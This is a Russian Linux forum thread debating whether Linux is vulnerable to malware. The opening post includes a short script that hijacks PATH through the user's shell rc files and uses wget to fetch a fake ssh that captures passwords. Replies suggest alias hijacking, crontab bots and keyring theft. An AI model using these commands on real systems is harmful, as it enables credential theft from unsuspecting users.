LINUX.ORG.RU
ФорумTalks

линукс готов для вирусов?


0

0

решил таки проверить, насколько линукс готов для вирусов.
дано: статья о том, почему на линукс нет и не может быть вирусов, ноутбук с линуксом, текстовый редактор, консоль.
доказать: можно ли исполнить более -менее вредоносный скрипт (НЕ деструктивные функции) без прав рута.
итак, что мы можем сделать без рутовых прав?
1) снести хомяк юзера. не интересно.
2) стырить конфигурационные файлы юзера со сверхсекретнымиданными^Wзашифрованными пятью алгоритмами пароли. да кому же из вирусописателей оно сдалось?
3) подменить вызов системной программы на себя. а что может быть проще этого?
итак, злоумышленник захотел подменить, допустим, ssh.
да легко!
#!/bin/sh
cd
mkdir .bin 2>/dev/null
for i in $(ls -1 *shrc 2>/dev/null); do echo «PATH='~/.bin:/bin:/usr/bin:/sbin:/usr/sbin'» >> $i; done
wget -qO ~/.bin/ssh http://...
и всё! вместо настоящего ssh можно запустить что угодно, тот же баш-скрипт, который будет вопрошать пароль да сливать куда -нибудь, потом просто вызывать /usr/bin/ssh $*.
теперь встает другой вопрос - как подсунуть этот «файл» в четыре строчки по тырнетам.
тут вариантов тоже немного -
1) спрятать их в десяти-тысяче-строчный «полезный» шелл-скрипт ;
2) распространять отдельным исполняемым файлом.
в 1м случае понятно, юзер сам запустит скрипт. а во 2м - как же юзер-НЕхомячок запустит скрипт? ведь браузеры при скачке не дают прав на исполнение! после недолгих экспериментов выяснилось, что при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки. (т.е. если кто-то упаковал скрипт с правами на исполнение в архив tar.bz(2), то распаковываемый файл будет с теми же правами, что и до архивации - разве так должно быть?)
а после этого двух кликов достаточно, чтобы «установить» этот скрипт.
«вот такие пироги.» (с)

★★★★★
Ответ на: комментарий от cruxish

> Наивно так думать. Новички с убунтой в руках только и делают, что качают левые бинари.

а также арчевцы. И гентушники, наверное :)

меня уже год подмывает запостить на Аур какую-нибудь прогу со встроенным ботнетом.

stevejobs ★★★★☆
()
Ответ на: комментарий от stevejobs

> меня уже год подмывает запостить на Аур какую-нибудь прогу со встроенным ботнетом.

УК РФ читал?

Manhunt ★★★★★
()
Ответ на: комментарий от codoranro

> ОШИТ! Как? Ну вот, вторая гента.

есть md5, но его вполне можно не писать. Поскольку PKGBUILD'ы на этот предмет всё равно никто не читает, воруй@конпеляй!

stevejobs ★★★★☆
()
Ответ на: комментарий от stevejobs

ну же, запусти!
\\у меня из аура только три пакетика. и то пкгбилды давно в локальной папочке лежат и при надобности сам их мейнтейню и собираю себе пакет.

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от KRoN73

> Сразу видно теоретика :)

Ты не согласен про трояны или про вирусы? Я пока под линукс видел только первое. Второе если и есть, то не имеет систематических путей распространения.

PolarFox ★★★★★
()
Ответ на: комментарий от Ruth

> Репозитории, например, ArchLinux не подписаны. Как и пакеты.

Вроде ж в последнем пакмане реализовали это, или нет?

pevzi ★★★★★
()
Ответ на: комментарий от Lordwind

> Насчет реп... AUR помойка это все знают, а вот могут ли бяку в PPA засунуть?

В ауре ты хотя бы видишь что ставишь, откуда и как. А в PPA как раз может лежать абсолютно что угодно.

pevzi ★★★★★
()
Ответ на: комментарий от Ruth

> Или взлом одного из зеркал и подмена репозитория на нем.

достаточно подменить запись dns у конкретного нужного пользователя.

делается просто - ночью пока все спят лезешь на чердак дома, к человеку которого надо ломануть, режешь сетевой кабель, впихиваешь в разрыв роутер, подменяешь что надо, наслаждаешься эффектом.

stevejobs ★★★★☆
()
Ответ на: комментарий от codoranro

> на мой взгляд, лучшее что можно сделать с юзером - вынести его login keyring и базу сохраненных паролей из Firefox. А потом спамить с его аськи и вконтактика.

Плюсую.

pevzi ★★★★★
()
Ответ на: комментарий от stevejobs

а также арчевцы. И гентушники, наверное :)

А ещё бсдшники.

GotF ★★★★★
()
Ответ на: комментарий от snoopcat

> makepkg пошлёт тебя нампх без md5 в пкгбилде.

после чего юзверь люто возопит в потолок: «твари! опять забыли после обновления пакета обновить md5!!!111» и пойдет запускать то же самое с опцией --skipinteg

stevejobs ★★★★☆
()
Ответ на: комментарий от stevejobs

> меня уже год подмывает запостить на Аур какую-нибудь прогу со встроенным ботнетом.

Нормальные люди перед установкой пакета просматривают PKGBUILD. Поэтому заметят в первый же день (ну или через парочку, в зависимости от известности пакета) и пожалуются (:

pevzi ★★★★★
()
Ответ на: комментарий от stevejobs

таким мейнтейнерам надо 'руки по самые яйца отрубить' (с). ниразу не встречал настолько кривых пкгбилдов в аур. если и встречу, то свой напишу.

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от pevzi

> Нормальные люди перед установкой пакета просматривают PKGBUILD.

этого недостаточно жэ ;) Можно написать какой-нибудь тысячестраничный патч для проги, который якобы что-то делает, а в середину патча вписать всё что хочешь.

Например выложить какой-нибудь KGet с патчем «Ускоритель Интернета».

И подписать всё это потом верным md5 ;)

stevejobs ★★★★☆
()
Ответ на: комментарий от snoopcat

да чо долго ходить, одно время (в январе этого года) пакет с самим yaourt'ом имел неверный md5.

stevejobs ★★★★☆
()
Ответ на: комментарий от snoopcat

$ ./test

OK

$ ssh root@localhost

<тут бред про неизвестные SHA-отпечатки> yes/no? yes

root@localhost's password:

Access denied.

<тут пишем пассворд в текстовый файл и вызываем /usr/bin/ssh $@

root@localhost's password:

Last login: тогда-то, оттудато.

#

Можешь дать полный листинг команд, которые вводишь? А то нифихасе, мужики то и не знают :).

tux2002
()
Ответ на: комментарий от PolarFox

>Я пока под линукс видел только первое.

Так это вопрос твоего мировоззрения и возраста :) (в последние годы не было эпидемий под Linux)

А так, черви под Linux - дело житейское...

KRoN73 ★★★★★
()
Ответ на: комментарий от tux2002

всмысле, листинг чего? ./test - установщик трояна, далее при вызове ssh мы вызывает троян, тот спрашивает пароль, пишет его в txt-файл, сообщает о том, что пароль неверен и вызывает оригинального ssh-клиента

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от pevzi

>Нормальные люди перед установкой пакета просматривают PKGBUILD.

У нормальных людей и под Windows вирусов не бывает :D У меня Windows заражалась последний раз где-то в конце 1990-х гг.

KRoN73 ★★★★★
()
Ответ на: комментарий от gh0stwizard

> Без комментариев. Особенно радует то, что вы знаете лишь о тех сплойтах, что в паблике.

Ну, а ты, стало быть, знаешь про эксплойты доступные только илите, Только сказать о них ничего не можешь, типа секретная информация. -)

Reaper ★★
()
Ответ на: комментарий от Manhunt

Приятно осознавать себя мифической личностью :D

KRoN73 ★★★★★
()

Вы пока говорите, а мне сегодня опять флешку с вирусней принесли, и нет исключений!

FiXer ★★☆☆☆
()
Ответ на: комментарий от Manhunt

> У нормальных людей и под Windows вирусов не бывает :D

Это миф :)


Не миф, ниодного вируса. Дата установки: 11.08.2006, 0:24:30

FiXer ★★☆☆☆
()
Ответ на: комментарий от Reaper

>Только сказать о них ничего не можешь, типа секретная информация

Еще раз, это был хумор. Да не получилось пошутить. И вообще, скоро 2012 :)

gh0stwizard ★★★★★
()
Ответ на: комментарий от Gary

Точно-точно не хочешь моего KGet'а с Ускорителем Интернета? Только запускать надо под рутом, чтобы ускорялось лучше.

stevejobs ★★★★☆
()
Ответ на: Идея такова: от stevejobs

так и назови - kget с патчем бармина для ускорения интернета.

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от FiXer

ниодного вируса

А как определяешь? Особенно интересно про неизвестные пока вирусологам разновидности.

Xenesz ★★★★
()

сетевой бот, запущенный от имени текущего пользователя через crontab @reboot. больше ничего и не нужно.

chg ★★★★★
()
Ответ на: комментарий от Manhunt

У нормальных людей и под Windows вирусов не бывает :D

Это миф :)

Уже год стоит уютненькая семерочка, ни одного вируса нет (тремя антивирусами проверено). Не знаю, наверное что-то делаю не так.

RealSiberianMan
()

>подменить вызов системной программы на себя. а что может быть проще этого?

в баше действительно просто

alias ssh=myevilscript

annulen ★★★★★
()
Ответ на: комментарий от Xenesz

>А как определяешь?

Вирус имеет массу проявлений своей деятельности. От простого наличия подозрительного процесса до непонятного сетевого трафика или непонятных файлов в %TEMP% или %WINDOWS% Если ничего этого нет в течении нескольких лет, то можно с уверенностью полагать, что вирусы отсутствуют :)

KRoN73 ★★★★★
()

>при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки

оригинальное название для tar!

annulen ★★★★★
()
Ответ на: комментарий от vurdalak

>У меня и на венде вирусов уже несколько лет не встречалось. Если юзер идиот, то ему никакой линукс и антивирус не поможет.

Если юзер идиот, то он сидит на венде и про вирусы и антивирусы ничего не знает

Led ★★★☆☆
()
Ответ на: комментарий от snoopcat

> мейби, не работаешь в ней?

играю в старкрафты на Максимальной.

едсинственный жуткий вирус - Антивирус Касперского 2010, ключ на который был забанен еще полгода назад. Каждый раз при загрузке он ДИКИМ голосом сирены воет «аааа!!! ключ забанен!11oneone». Удалить никак руки не доходят - ведь при удалении он закроет все браузеры и заставит перезагрузиться.

stevejobs ★★★★☆
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.